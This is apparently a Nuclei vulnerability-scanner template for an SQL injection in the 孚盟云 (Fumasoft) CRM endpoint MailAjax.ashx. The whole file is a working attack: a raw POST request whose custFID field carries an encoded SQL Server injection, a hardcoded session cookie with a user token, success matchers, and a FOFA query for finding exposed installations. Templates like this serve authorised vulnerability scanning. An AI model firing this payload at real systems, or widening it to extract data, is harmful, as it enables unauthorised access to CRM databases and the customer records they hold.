id: fumasoft-MailAjax-sqli
info:
  name: 孚盟云 CRM MailAjax.ashx - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/main/%E5%AD%9A%E7%9B%9F%E4%BA%91/%E5%AD%9A%E7%9B%9F%E4%BA%91%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3MailAjax.ashx%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="孚盟软件-孚盟云"
    hunter-query: demo
  tags: fumasoft,sqli

http:
  - raw:
      - |
        POST /Ajax/MailAjax.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: UserCookie={"LicNo":"","lastLoginIp":"","LicSelected":"cloud","ProductID":"M8","loginUser":"00210","userToken":"A39418D1C5EADEFD41E99B71976A531E24EC2C6B9E7D4CD460A406769A97CC9DE2966975679C521F499A8F215B51B65C4D067F57D94D260B6EF4C16094D56562"}
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        action=GetMailContactsCard&custFID=%28SELECT%20CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%287588%3D7588%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains(body,'qkvzq1qzjkq')
        condition: and